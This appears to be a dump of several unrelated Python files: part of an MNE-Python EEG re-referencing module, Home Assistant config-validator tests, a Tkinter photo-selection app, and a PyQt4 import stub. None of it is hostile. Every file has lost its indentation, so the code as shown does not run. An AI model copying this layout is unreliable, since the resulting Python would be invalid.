nchan = len(inst.info['ch_names'])
# only do this if we actually have digitisation points
if inst.info.get('dig', None) is not None:
# "zeroth" EEG electrode dig points is reference
ref_dig_loc = [dl for dl in inst.info['dig'] if (
dl['kind'] == FIFF.FIFFV_POINT_EEG and
dl['ident'] == 0)]
if len(ref_channels) > 1 or len(ref_dig_loc) != len(ref_channels):
ref_dig_array = np.full(12, np.nan)
warn('The locations of multiple reference channels are ignored.')
else: # n_ref_channels == 1 and a single ref digitization exists
ref_dig_array = np.concatenate((ref_dig_loc[0]['r'],
ref_dig_loc[0]['r'], np.zeros(6)))
# Replace the (possibly new) Ref location for each channel
for idx in pick_types(inst.info, meg=False, eeg=True, exclude=[]):
inst.info['chs'][idx]['loc'][3:6] = ref_dig_loc[0]['r']
else:
# Ideally we'd fall back on getting the location from a montage, but
# locations for non-present channels aren't stored, so location is
# unknown. Users can call set_montage() again if needed.
ref_dig_array = np.full(12, np.nan)
logger.info('Location for this channel is unknown; consider calling '
'set_montage() again if needed.')
for ch in ref_channels:
chan_info = {'ch_name': ch,
'coil_type': FIFF.FIFFV_COIL_EEG,
'kind': FIFF.FIFFV_EEG_CH,
'logno': nchan + 1,
'scanno': nchan + 1,
'cal': 1,
'range': 1.,
'unit_mul': 0.,
'unit': FIFF.FIFF_UNIT_V,
'coord_frame': FIFF.FIFFV_COORD_HEAD,
'loc': ref_dig_array}
inst.info['chs'].append(chan_info)
inst.info._update_redundant()
if isinstance(inst, BaseRaw):
inst._cals = np.hstack((inst._cals, [1] * len(ref_channels)))
range_ = np.arange(1, len(ref_channels) + 1)
for pi, picks in enumerate(inst._read_picks):
inst._read_picks[pi] = np.concatenate(
[picks, np.max(picks) + range_])
inst.info._check_consistency()
set_eeg_reference(inst, ref_channels=ref_channels, copy=False,
verbose=False)
return inst
_ref_dict = {
FIFF.FIFFV_MNE_CUSTOM_REF_ON: 'on',
FIFF.FIFFV_MNE_CUSTOM_REF_OFF: 'off',
FIFF.FIFFV_MNE_CUSTOM_REF_CSD: 'CSD',
}
def _check_can_reref(inst):
_validate_type(inst, (BaseRaw, BaseEpochs, Evoked), "Instance")
current_custom = inst.info['custom_ref_applied']
if current_custom not in (FIFF.FIFFV_MNE_CUSTOM_REF_ON,
FIFF.FIFFV_MNE_CUSTOM_REF_OFF):
raise RuntimeError('Cannot set new reference on data with custom '
'reference type %r' % (_ref_dict[current_custom],))
@verbose
def set_eeg_reference(inst, ref_channels='average', copy=True,
projection=False, ch_type='auto', forward=None,
verbose=None):
"""Specify which reference to use for EEG data.
Use this function to explicitly specify the desired reference for EEG.
This can be either an existing electrode or a new virtual channel.
This function will re-reference the data according to the desired
reference.
Parameters
----------
inst : instance of Raw | Epochs | Evoked
Instance of Raw or Epochs with EEG channels and reference channel(s).
%(ref_channels_set_eeg_reference)s
copy : bool
Specifies whether the data will be copied (True) or modified in-place
(False). Defaults to True.
%(projection_set_eeg_reference)s
%(ch_type_set_eeg_reference)s
%(forward_set_eeg_reference)s
%(verbose)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
Data with EEG channels re-referenced. If ``ref_channels='average'`` and
``projection=True`` a projection will be added instead of directly
re-referencing the data.
ref_data : array
Array of reference data subtracted from EEG channels. This will be
``None`` if ``projection=True`` or ``ref_channels='REST'``.
%(set_eeg_reference_see_also_notes)s
"""
from ..forward import Forward
_check_can_reref(inst)
if projection: # average reference projector
if ref_channels != 'average':
raise ValueError('Setting projection=True is only supported for '
'ref_channels="average", got %r.'
% (ref_channels,))
if _has_eeg_average_ref_proj(inst.info['projs']):
warn('An average reference projection was already added. The data '
'has been left untouched.')
else:
# Creating an average reference may fail. In this case, make
# sure that the custom_ref_applied flag is left untouched.
custom_ref_applied = inst.info['custom_ref_applied']
try:
with inst.info._unlock():
inst.info['custom_ref_applied'] = \
FIFF.FIFFV_MNE_CUSTOM_REF_OFF
inst.add_proj(make_eeg_average_ref_proj(inst.info,
activate=False))
except Exception:
with inst.info._unlock():
inst.info['custom_ref_applied'] = custom_ref_applied
raise
# If the data has been preloaded, projections will no
# longer be automatically applied.
if inst.preload:
logger.info('Average reference projection was added, '
'but has not been applied yet. Use the '
'apply_proj method to apply it.')
return inst, None
del projection # not used anymore
inst = inst.copy() if copy else inst
ch_type = _get_ch_type(inst, ch_type)
ch_dict = {**{type_: True for type_ in ch_type},
'meg': False, 'ref_meg': False}
ch_sel = [inst.ch_names[i] for i in pick_types(inst.info, **ch_dict)]
if ref_channels == 'REST':
_validate_type(forward, Forward, 'forward when ref_channels="REST"')
else:
forward = None # signal to _apply_reference not to do REST
if ref_channels in ('average', 'REST'):
logger.info(f'Applying {ref_channels} reference.')
ref_channels = ch_sel
if ref_channels == []:
logger.info('EEG data marked as already having the desired reference.')
else:
logger.info(
'Applying a custom '
f"{tuple(DEFAULTS['titles'][type_] for type_ in ch_type)} "
'reference.')
return _apply_reference(inst, ref_channels, ch_sel, forward,
ch_type=ch_type)
def _get_ch_type(inst, ch_type):
_validate_type(ch_type, (str, list, tuple), 'ch_type')
valid_ch_types = ('auto', 'eeg', 'ecog', 'seeg', 'dbs')
if isinstance(ch_type, str):
_check_option('ch_type', ch_type, valid_ch_types)
if ch_type != 'auto':
ch_type = [ch_type]
elif isinstance(ch_type, (list, tuple)):
for type_ in ch_type:
_validate_type(type_, str, 'ch_type')
_check_option('ch_type', type_, valid_ch_types[1:])
ch_type = list(ch_type)
# if ch_type is 'auto', search through list to find first reasonable
# reference-able channel type.
if ch_type == 'auto':
for type_ in ['eeg', 'ecog', 'seeg', 'dbs']:
if type_ in inst:
ch_type = [type_]
logger.info('%s channel type selected for '
're-referencing' % DEFAULTS['titles'][type_])
break
# if auto comes up empty, or the user specifies a bad ch_type.
else:
raise ValueError('No EEG, ECoG, sEEG or DBS channels found '
'to rereference.')
return ch_type
@verbose
def set_bipolar_reference(inst, anode, cathode, ch_name=None, ch_info=None,
drop_refs=True, copy=True, verbose=None):
"""Re-reference selected channels using a bipolar referencing scheme.
A bipolar reference takes the difference between two channels (the anode
minus the cathode) and adds it as a new virtual channel. The original
channels will be dropped by default.
Multiple anodes and cathodes can be specified, in which case multiple
virtual channels will be created. The 1st cathode will be subtracted
from the 1st anode, the 2nd cathode from the 2nd anode, etc.
By default, the virtual channels will be annotated with channel-info and
-location of the anodes and coil types will be set to EEG_BIPOLAR.
Parameters
----------
inst : instance of Raw | Epochs | Evoked
Data containing the unreferenced channels.
anode : str | list of str
The name(s) of the channel(s) to use as anode in the bipolar reference.
cathode : str | list of str
The name(s) of the channel(s) to use as cathode in the bipolar
reference.
ch_name : str | list of str | None
The channel name(s) for the virtual channel(s) containing the resulting
signal. By default, bipolar channels are named after the anode and
cathode, but it is recommended to supply a more meaningful name.
ch_info : dict | list of dict | None
This parameter can be used to supply a dictionary (or a dictionary for
each bipolar channel) containing channel information to merge in,
overwriting the default values. Defaults to None.
drop_refs : bool
Whether to drop the anode/cathode channels from the instance.
copy : bool
Whether to operate on a copy of the data (True) or modify it in-place
(False). Defaults to True.
%(verbose)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
Data with the specified channels re-referenced.
See Also
--------
set_eeg_reference : Convenience function for creating an EEG reference.
Notes
-----
1. If the anodes contain any EEG channels, this function removes
any pre-existing average reference projections.
2. During source localization, the EEG signal should have an average
reference.
3. The data must be preloaded.
.. versionadded:: 0.9.0
"""
from .meas_info import create_info
from ..io import RawArray
from ..epochs import EpochsArray
from ..evoked import EvokedArray
_check_can_reref(inst)
if not isinstance(anode, list):
anode = [anode]
if not isinstance(cathode, list):
cathode = [cathode]
if len(anode) != len(cathode):
raise ValueError('Number of anodes (got %d) must equal the number '
'of cathodes (got %d).' % (len(anode), len(cathode)))
if ch_name is None:
ch_name = [f'{a}-{c}' for (a, c) in zip(anode, cathode)]
elif not isinstance(ch_name, list):
ch_name = [ch_name]
if len(ch_name) != len(anode):
raise ValueError('Number of channel names must equal the number of '
'anodes/cathodes (got %d).' % len(ch_name))
# Check for duplicate channel names (it is allowed to give the name of the
# anode or cathode channel, as they will be replaced).
for ch, a, c in zip(ch_name, anode, cathode):
if ch not in [a, c] and ch in inst.ch_names:
raise ValueError('There is already a channel named "%s", please '
'specify a different name for the bipolar '
'channel using the ch_name parameter.' % ch)
if ch_info is None:
ch_info = [{} for _ in anode]
elif not isinstance(ch_info, list):
ch_info = [ch_info]
if len(ch_info) != len(anode):
raise ValueError('Number of channel info dictionaries must equal the '
'number of anodes/cathodes.')
if copy:
inst = inst.copy()
anode = _check_before_reference(inst, ref_from=cathode,
ref_to=anode, ch_type='auto')
# Create bipolar reference channels by multiplying the data
# (channels x time) with a matrix (n_virtual_channels x channels)
# and add them to the instance.
multiplier = np.zeros((len(anode), len(inst.ch_names)))
for idx, (a, c) in enumerate(zip(anode, cathode)):
multiplier[idx, inst.ch_names.index(a)] = 1
multiplier[idx, inst.ch_names.index(c)] = -1
ref_info = create_info(ch_names=ch_name, sfreq=inst.info['sfreq'],
ch_types=inst.get_channel_types(picks=anode))
# Update "chs" in Reference-Info.
for ch_idx, (an, info) in enumerate(zip(anode, ch_info)):
_check_ch_keys(info, ch_idx, name='ch_info', check_min=False)
an_idx = inst.ch_names.index(an)
# Copy everything from anode (except ch_name).
an_chs = {k: v for k, v in inst.info['chs'][an_idx].items()
if k != 'ch_name'}
ref_info['chs'][ch_idx].update(an_chs)
# Set coil-type to bipolar.
ref_info['chs'][ch_idx]['coil_type'] = FIFF.FIFFV_COIL_EEG_BIPOLAR
# Update with info from ch_info-parameter.
ref_info['chs'][ch_idx].update(info)
# Set other info-keys from original instance.
pick_info = {k: v for k, v in inst.info.items() if k not in
['chs', 'ch_names', 'bads', 'nchan', 'sfreq']}
with ref_info._unlock():
ref_info.update(pick_info)
# Rereferencing of data.
ref_data = multiplier @ inst._data
if isinstance(inst, BaseRaw):
ref_inst = RawArray(ref_data, ref_info, first_samp=inst.first_samp,
copy=None)
elif isinstance(inst, BaseEpochs):
ref_inst = EpochsArray(ref_data, ref_info, events=inst.events,
tmin=inst.tmin, event_id=inst.event_id,
metadata=inst.metadata)
else:
ref_inst = EvokedArray(ref_data, ref_info, tmin=inst.tmin,
comment=inst.comment, nave=inst.nave,
kind='average')
# Add referenced instance to original instance.
inst.add_channels([ref_inst], force_update_info=True)
added_channels = ', '.join([name for name in ch_name])
logger.info(f'Added the following bipolar channels:\n{added_channels}')
for attr_name in ['picks', '_projector']:
setattr(inst, attr_name, None)
# Drop remaining channels.
if drop_refs:
drop_channels = list((set(anode) | set(cathode)) & set(inst.ch_names))
inst.drop_channels(drop_channels)
return inst
|
|
"""Test config validators."""
from datetime import timedelta, datetime, date
import enum
import os
from socket import _GLOBAL_DEFAULT_TIMEOUT
from unittest.mock import Mock, patch
import pytest
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
def test_boolean():
"""Test boolean validation."""
schema = vol.Schema(cv.boolean)
for value in ('T', 'negative', 'lock'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('true', 'On', '1', 'YES', 'enable', 1, True):
assert schema(value)
for value in ('false', 'Off', '0', 'NO', 'disable', 0, False):
assert not schema(value)
def test_latitude():
"""Test latitude validation."""
schema = vol.Schema(cv.latitude)
for value in ('invalid', None, -91, 91, '-91', '91', '123.01A'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('-89', 89, '12.34'):
schema(value)
def test_longitude():
"""Test longitude validation."""
schema = vol.Schema(cv.longitude)
for value in ('invalid', None, -181, 181, '-181', '181', '123.01A'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('-179', 179, '12.34'):
schema(value)
def test_port():
"""Test TCP/UDP network port."""
schema = vol.Schema(cv.port)
for value in ('invalid', None, -1, 0, 80000, '81000'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('1000', 21, 24574):
schema(value)
def test_isfile():
"""Validate that the value is an existing file."""
schema = vol.Schema(cv.isfile)
fake_file = 'this-file-does-not.exist'
assert not os.path.isfile(fake_file)
for value in ('invalid', None, -1, 0, 80000, fake_file):
with pytest.raises(vol.Invalid):
schema(value)
# patching methods that allow us to fake a file existing
# with write access
with patch('os.path.isfile', Mock(return_value=True)), \
patch('os.access', Mock(return_value=True)):
schema('test.txt')
def test_url():
"""Test URL."""
schema = vol.Schema(cv.url)
for value in ('invalid', None, 100, 'htp://ha.io', 'http//ha.io',
'http://??,**', 'https://??,**'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('http://localhost', 'https://localhost/test/index.html',
'http://home-assistant.io', 'http://home-assistant.io/test/',
'https://community.home-assistant.io/'):
assert schema(value)
def test_platform_config():
"""Test platform config validation."""
options = (
{},
{'hello': 'world'},
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
cv.PLATFORM_SCHEMA(value)
options = (
{'platform': 'mqtt'},
{'platform': 'mqtt', 'beer': 'yes'},
)
for value in options:
cv.PLATFORM_SCHEMA(value)
def test_ensure_list():
"""Test ensure_list."""
schema = vol.Schema(cv.ensure_list)
assert [] == schema(None)
assert [1] == schema(1)
assert [1] == schema([1])
assert ['1'] == schema('1')
assert ['1'] == schema(['1'])
assert [{'1': '2'}] == schema({'1': '2'})
def test_entity_id():
"""Test entity ID validation."""
schema = vol.Schema(cv.entity_id)
with pytest.raises(vol.MultipleInvalid):
schema('invalid_entity')
assert schema('sensor.LIGHT') == 'sensor.light'
def test_entity_ids():
"""Test entity ID validation."""
schema = vol.Schema(cv.entity_ids)
options = (
'invalid_entity',
'sensor.light,sensor_invalid',
['invalid_entity'],
['sensor.light', 'sensor_invalid'],
['sensor.light,sensor_invalid'],
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
[],
['sensor.light'],
'sensor.light'
)
for value in options:
schema(value)
assert schema('sensor.LIGHT, light.kitchen ') == [
'sensor.light', 'light.kitchen'
]
def test_entity_domain():
"""Test entity domain validation."""
schema = vol.Schema(cv.entity_domain('sensor'))
options = (
'invalid_entity',
'cover.demo',
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
print(value)
schema(value)
assert schema('sensor.LIGHT') == 'sensor.light'
def test_entities_domain():
"""Test entities domain validation."""
schema = vol.Schema(cv.entities_domain('sensor'))
options = (
None,
'',
'invalid_entity',
['sensor.light', 'cover.demo'],
['sensor.light', 'sensor_invalid'],
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
'sensor.light',
['SENSOR.light'],
['sensor.light', 'sensor.demo']
)
for value in options:
schema(value)
assert schema('sensor.LIGHT, sensor.demo ') == [
'sensor.light', 'sensor.demo'
]
assert schema(['sensor.light', 'SENSOR.demo']) == [
'sensor.light', 'sensor.demo'
]
def test_ensure_list_csv():
"""Test ensure_list_csv."""
schema = vol.Schema(cv.ensure_list_csv)
options = (
None,
12,
[],
['string'],
'string1,string2'
)
for value in options:
schema(value)
assert schema('string1, string2 ') == [
'string1', 'string2'
]
def test_event_schema():
"""Test event_schema validation."""
options = (
{}, None,
{
'event_data': {},
},
{
'event': 'state_changed',
'event_data': 1,
},
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
cv.EVENT_SCHEMA(value)
options = (
{'event': 'state_changed'},
{'event': 'state_changed', 'event_data': {'hello': 'world'}},
)
for value in options:
cv.EVENT_SCHEMA(value)
def test_icon():
"""Test icon validation."""
schema = vol.Schema(cv.icon)
for value in (False, 'work', 'icon:work'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
schema('mdi:work')
def test_time_period():
"""Test time_period validation."""
schema = vol.Schema(cv.time_period)
options = (
None, '', 'hello:world', '12:', '12:34:56:78',
{}, {'wrong_key': -10}
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
'8:20', '23:59', '-8:20', '-23:59:59', '-48:00', {'minutes': 5}, 1, '5'
)
for value in options:
schema(value)
assert timedelta(seconds=180) == schema('180')
assert timedelta(hours=23, minutes=59) == schema('23:59')
assert -1 * timedelta(hours=1, minutes=15) == schema('-1:15')
def test_service():
"""Test service validation."""
schema = vol.Schema(cv.service)
with pytest.raises(vol.MultipleInvalid):
schema('invalid_turn_on')
schema('homeassistant.turn_on')
def test_service_schema():
"""Test service_schema validation."""
options = (
{}, None,
{
'service': 'homeassistant.turn_on',
'service_template': 'homeassistant.turn_on'
},
{
'data': {'entity_id': 'light.kitchen'},
},
{
'service': 'homeassistant.turn_on',
'data': None
},
{
'service': 'homeassistant.turn_on',
'data_template': {
'brightness': '{{ no_end'
}
},
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
cv.SERVICE_SCHEMA(value)
options = (
{'service': 'homeassistant.turn_on'},
{
'service': 'homeassistant.turn_on',
'entity_id': 'light.kitchen',
},
{
'service': 'homeassistant.turn_on',
'entity_id': ['light.kitchen', 'light.ceiling'],
},
)
for value in options:
cv.SERVICE_SCHEMA(value)
def test_slug():
"""Test slug validation."""
schema = vol.Schema(cv.slug)
for value in (None, 'hello world'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in (12345, 'hello'):
schema(value)
def test_string():
"""Test string validation."""
schema = vol.Schema(cv.string)
with pytest.raises(vol.Invalid):
schema(None)
with pytest.raises(vol.Invalid):
schema([])
with pytest.raises(vol.Invalid):
schema({})
for value in (True, 1, 'hello'):
schema(value)
def test_temperature_unit():
"""Test temperature unit validation."""
schema = vol.Schema(cv.temperature_unit)
with pytest.raises(vol.MultipleInvalid):
schema('K')
schema('C')
schema('F')
def test_x10_address():
"""Test x10 addr validator."""
schema = vol.Schema(cv.x10_address)
with pytest.raises(vol.Invalid):
schema('Q1')
schema('q55')
schema('garbage_addr')
schema('a1')
schema('C11')
def test_template():
"""Test template validator."""
schema = vol.Schema(cv.template)
for value in (None, '{{ partial_print }', '{% if True %}Hello', ['test']):
with pytest.raises(vol.Invalid,
message='{} not considered invalid'.format(value)):
schema(value)
options = (
1, 'Hello',
'{{ beer }}',
'{% if 1 == 1 %}Hello{% else %}World{% endif %}',
)
for value in options:
schema(value)
def test_template_complex():
"""Test template_complex validator."""
schema = vol.Schema(cv.template_complex)
for value in (None, '{{ partial_print }', '{% if True %}Hello'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
1, 'Hello',
'{{ beer }}',
'{% if 1 == 1 %}Hello{% else %}World{% endif %}',
{'test': 1, 'test2': '{{ beer }}'},
['{{ beer }}', 1]
)
for value in options:
schema(value)
def test_time_zone():
"""Test time zone validation."""
schema = vol.Schema(cv.time_zone)
with pytest.raises(vol.MultipleInvalid):
schema('America/Do_Not_Exist')
schema('America/Los_Angeles')
schema('UTC')
def test_date():
"""Test date validation."""
schema = vol.Schema(cv.date)
for value in ['Not a date', '23:42', '2016-11-23T18:59:08']:
with pytest.raises(vol.Invalid):
schema(value)
schema(datetime.now().date())
schema('2016-11-23')
def test_time():
"""Test date validation."""
schema = vol.Schema(cv.time)
for value in ['Not a time', '2016-11-23', '2016-11-23T18:59:08']:
with pytest.raises(vol.Invalid):
schema(value)
schema(datetime.now().time())
schema('23:42:00')
schema('23:42')
def test_datetime():
"""Test date time validation."""
schema = vol.Schema(cv.datetime)
for value in [date.today(), 'Wrong DateTime', '2016-11-23']:
with pytest.raises(vol.MultipleInvalid):
schema(value)
schema(datetime.now())
schema('2016-11-23T18:59:08')
def test_deprecated(caplog):
"""Test deprecation log."""
schema = vol.Schema({
'venus': cv.boolean,
'mars': cv.boolean
})
deprecated_schema = vol.All(
cv.deprecated('mars'),
schema
)
deprecated_schema({'venus': True})
# pylint: disable=len-as-condition
assert len(caplog.records) == 0
deprecated_schema({'mars': True})
assert len(caplog.records) == 1
assert caplog.records[0].name == __name__
assert ("The 'mars' option (with value 'True') is deprecated, "
"please remove it from your configuration.") in caplog.text
def test_key_dependency():
"""Test key_dependency validator."""
schema = vol.Schema(cv.key_dependency('beer', 'soda'))
options = (
{'beer': None}
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
{'beer': None, 'soda': None},
{'soda': None}, {}
)
for value in options:
schema(value)
def test_has_at_least_one_key():
"""Test has_at_least_one_key validator."""
schema = vol.Schema(cv.has_at_least_one_key('beer', 'soda'))
for value in (None, [], {}, {'wine': None}):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ({'beer': None}, {'soda': None}):
schema(value)
def test_enum():
"""Test enum validator."""
class TestEnum(enum.Enum):
"""Test enum."""
value1 = "Value 1"
value2 = "Value 2"
schema = vol.Schema(cv.enum(TestEnum))
with pytest.raises(vol.Invalid):
schema('value3')
def test_socket_timeout(): # pylint: disable=invalid-name
"""Test socket timeout validator."""
schema = vol.Schema(cv.socket_timeout)
with pytest.raises(vol.Invalid):
schema(0.0)
with pytest.raises(vol.Invalid):
schema(-1)
assert _GLOBAL_DEFAULT_TIMEOUT == schema(None)
assert schema(1) == 1.0
def test_matches_regex():
"""Test matches_regex validator."""
schema = vol.Schema(cv.matches_regex('.*uiae.*'))
with pytest.raises(vol.Invalid):
schema(1.0)
with pytest.raises(vol.Invalid):
schema(" nrtd ")
test_str = "This is a test including uiae."
assert(schema(test_str) == test_str)
def test_is_regex():
"""Test the is_regex validator."""
schema = vol.Schema(cv.is_regex)
with pytest.raises(vol.Invalid):
schema("(")
with pytest.raises(vol.Invalid):
schema({"a dict": "is not a regex"})
valid_re = ".*"
schema(valid_re)
def test_comp_entity_ids():
"""Test config validation for component entity IDs."""
schema = vol.Schema(cv.comp_entity_ids)
for valid in ('ALL', 'all', 'AlL', 'light.kitchen', ['light.kitchen'],
['light.kitchen', 'light.ceiling'], []):
schema(valid)
for invalid in (['light.kitchen', 'not-entity-id'], '*', ''):
with pytest.raises(vol.Invalid):
schema(invalid)
|
|
try:
from Tkinter import *
except ImportError:
from tkinter import *
try:
import tkMessageBox
except ImportError:
from tkinter import messagebox as tkMessageBox
try:
import tkFileDialog
except ImportError:
from tkinter import filedialog as tkFileDialog
import os
from PIL import Image, ImageTk
class App:
def __init__(self, master):
# Set NULL references to image & label objects at APP init
self.curimage = None
self.oldimlabel = None
self.oldtxtlabel = None
self.curimgidx = 0
# Initialize empty lists to denote loaded, selected, rejected images
self.loaded = []
self.selected = []
self.rejected = []
self.tentative = []
# Use a string var and anchor it to a text label. Any change to string var will
# be displayed by the text label.
self.textstring = StringVar()
self.photoindex = StringVar()
# Image load path
self.file_path_str = []
# Selected image list file path
self.out_file_path_str = []
# Setup a frame (child of master) to display buttons
self.frame = Frame (master)
# Show frame.
self.frame.pack()
# Setup a frame (child of Frame) to display image
self.imframe = Frame (self.frame, relief=SUNKEN)
# Show frame.
self.imframe.pack(side=BOTTOM)
# Setup a frame (child of imrame) to display image
self.txtboxframe = Frame (self.imframe, relief=SUNKEN)
# Show frame.
self.txtboxframe.pack(side=BOTTOM)
# Setup buttons with actions triggering command=$$$ function.
self.loadbutton = Button (self.frame, text="LOAD", command=self.loadpic)
self.loadbutton.pack(side=LEFT)
self.firstbutton = Button (self.frame, text="FIRST", command=self.firstpic)
self.firstbutton.pack(side=LEFT)
self.lastbutton = Button (self.frame, text="LAST", command=self.lastpic)
self.lastbutton.pack(side=LEFT)
self.quitbutton = Button (self.frame, text="QUIT", command=self.quitprog)
self.quitbutton.pack(side=RIGHT)
self.selectbutton = Button (self.frame, text="SELECT", command=self.selectpic, height=10, width=10)
self.selectbutton.pack(side=LEFT)
self.nextbutton = Button (self.frame, text="NEXT", command=self.nextpic)
self.nextbutton.pack(side=LEFT)
self.previousbutton = Button (self.frame, text="PREVIOUS", command=self.previouspic)
self.previousbutton.pack(side=LEFT)
self.rotatebutton = Button (self.frame, text="ROTATE LEFT", command=self.rotatepicleft)
self.rotatebutton.pack(side=RIGHT)
self.rotatebutton = Button (self.frame, text="ROTATE RIGHT", command=self.rotatepicright)
self.rotatebutton.pack(side=RIGHT)
# Setup a text label to show display image index and anchor it to a string var.
# self.txtlabel = Label (self.imframe, textvar=self.textstring)
# self.txtlabel.pack(side=BOTTOM)
# Set up a label with entry to take input for Go to a particular photo
self.gotolabel = Label (self.txtboxframe, textvar= self.textstring)
self.gotolabel.pack(side=RIGHT)
self.txtbox = Entry (self.txtboxframe, textvariable=self.photoindex, bd=1, width=4, justify=RIGHT)
self.txtbox.bind('<Return>', self.get)
self.txtbox.pack(side=LEFT)
# self.gotobutton = Button (self.frame, text="GO TO", command=self.gotopicture)
# self.gotobutton.pack(side=BOTTOM)
# Note that the default pic is un-rotated. Used to toggle thumbnail
# self.rotated = 0
# Quit button action.
def quitprog (self):
# If selected list is not empty, prompt user for location to save list of selected images & append to it.
if self.selected:
self.out_file_path_str = tkFileDialog.askdirectory (title='Choose target dir to store selected files')
if not self.out_file_path_str:
tkMessageBox.showerror ("Error", "Choose valid dir")
return
self.out_file_path_str = os.path.join (self.out_file_path_str, 'selected_photos.txt')
with open (self.out_file_path_str, "a") as f:
for n in self.selected:
f.write (n+"\n")
# Quit program.
self.frame.quit ()
# Select button action.
def selectpic (self):
# Handle error condition: No images loaded yet.
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
# If selected, add to list if not previously added.
if self.selectbutton ["text"] == "SELECT":
if self.curimage not in self.selected:
self.selected.append (self.curimage)
self.selectbutton ["text"] = "UNSELECT"
else:
tkMessageBox.showwarning ("Warning", "Already selected!")
else:
self.selected.remove (self.curimage)
self.selectbutton ["text"] = "SELECT"
def showimage (self):
# if self.rotated:
# self.image.thumbnail ((648, 648), Image.ANTIALIAS)
# else:
# self.image.thumbnail ((648, 648), Image.ANTIALIAS)
self.image.thumbnail ((648, 648), Image.ANTIALIAS)
photo = ImageTk.PhotoImage (self.image)
self.imlabel = Label (self.imframe, image=photo, height=648, width=648)
self.imlabel.image = photo
self.imlabel.pack (side=BOTTOM)
if self.oldimlabel is not None:
self.oldimlabel.destroy ()
# Save a reference to image label (enables destroying to repaint)
self.oldimlabel = self.imlabel
def rotatepicleft (self):
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
self.image = self.image.rotate (90, expand=True)
# self.rotated = self.rotated ^ 1
self.showimage ()
def rotatepicright (self):
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
self.image = self.image.rotate (-90, expand=True)
# self.rotated = self.rotated ^ 1
self.showimage ()
def firstpic (self):
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
# Go to the first image in the list
self.curimgidx = 0
self.curimage = self.loaded [self.curimgidx]
self.image = Image.open (str(self.curimage))
self.showimage ()
self.photoindex.set( str (self.curimgidx + 1))
if self.curimage not in self.selected:
self.selectbutton ["text"] = "SELECT"
else:
self.selectbutton ["text"] = "UNSELECT"
def lastpic (self):
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
# Go to the last image in the list
self.curimgidx = self.loadedsize - 1
self.curimage = self.loaded [self.curimgidx]
self.image = Image.open (str(self.curimage))
self.showimage ()
self.photoindex.set( str (self.curimgidx + 1))
if self.curimage not in self.selected:
self.selectbutton ["text"] = "SELECT"
else:
self.selectbutton ["text"] = "UNSELECT"
def previouspic (self):
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
# Check for valid bounds of image list.
if (self.curimgidx - 1 >= 0):
self.curimage = self.loaded [self.curimgidx - 1]
self.curimgidx = self.curimgidx - 1
self.image = Image.open (str(self.curimage))
self.showimage ()
self.photoindex.set( str (self.curimgidx + 1))
if self.curimage not in self.selected:
self.selectbutton ["text"] = "SELECT"
else:
self.selectbutton ["text"] = "UNSELECT"
else:
tkMessageBox.showwarning ("Warning", "No previous images")
return
def nextpic (self):
self.rotated = 0
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
# Check for valid bounds of image list.
if (self.curimgidx + 1 < self.loadedsize):
self.curimage = self.loaded [self.curimgidx + 1]
self.curimgidx = self.curimgidx + 1
self.image = Image.open (str(self.curimage))
self.showimage ()
self.photoindex.set( str (self.curimgidx + 1))
if self.curimage not in self.selected:
self.selectbutton ["text"] = "SELECT"
else:
self.selectbutton ["text"] = "UNSELECT"
else:
tkMessageBox.showwarning ("Warning", "End of dir reached")
# Get the index of the picture to be shown
# Check if the image is there within bound
def get (self, event):
if not self.loaded:
tkMessageBox.showwarning ("Warning", "Load the directory using LOAD button before calling GO TO")
else:
gotoindex = event.widget.get()
#print gotoindex
if gotoindex.isdigit() :
index = int (gotoindex) - 1
#print int(gotoindex)
if ((index >= 0) and (index < self.loadedsize)):
self.curimage = self.loaded [index]
self.curimgidx = index
self.image = Image.open (str (self.curimage))
self.showimage()
self.photoindex.set (gotoindex)
if self.curimage not in self.selected:
self.selectbutton ["text"] = "SELECT"
else:
self.selectbutton ["text"] = "UNSELECT"
else:
tkMessageBox.showerror("Error", "Invalid Entry!")
else:
tkMessageBox.showerror("Error", "Invalid Entry!")
def loadpic (self):
self.file_path_str = tkFileDialog.askdirectory (title='Choose image dir')
if not self.file_path_str:
tkMessageBox.showerror ("Error", "Choose valid dir")
return
self.loaded = [os.path.join (self.file_path_str, f) for f in os.listdir (self.file_path_str) if (f.lower().endswith ('gif') or
f.lower().endswith ('bmp') or f.lower().endswith ('jpg') or
f.lower().endswith ('jpeg')) ]
self.loadedsize = len (self.loaded)
self.curimgidx = 0
if self.loadedsize is 0:
tkMessageBox.showwarning ("Warning", "Empty dir; no images")
else:
self.textstring.set ("/" + str (self.loadedsize));
self.photoindex.set(str(self.curimgidx + 1))
self.curimage = self.loaded [self.curimgidx]
self.image = Image.open (str (self.curimage))
self.showimage ()
tkMessageBox.showinfo ("Info", "Loaded %d images!" % self.loadedsize)
root = Tk()
root.wm_title ("Photo Manager")
app = App (root)
root.mainloop()
|
|
# -*- coding: utf-8 -*-
from PyQt4 import QtGui
from PyQt4.QtGui import QGridLayout, QLabel
from PyQt4.QtCore import Qt
